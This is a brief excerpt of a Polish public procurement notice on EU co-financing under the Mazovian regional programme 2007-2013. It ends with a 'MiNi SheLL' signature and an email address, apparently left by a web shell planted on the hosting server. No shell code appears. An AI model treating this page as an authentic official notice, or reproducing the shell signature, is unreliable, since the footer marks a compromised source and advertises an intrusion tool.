<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013, środków budżetu województwa mazowieckiego oraz środków budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com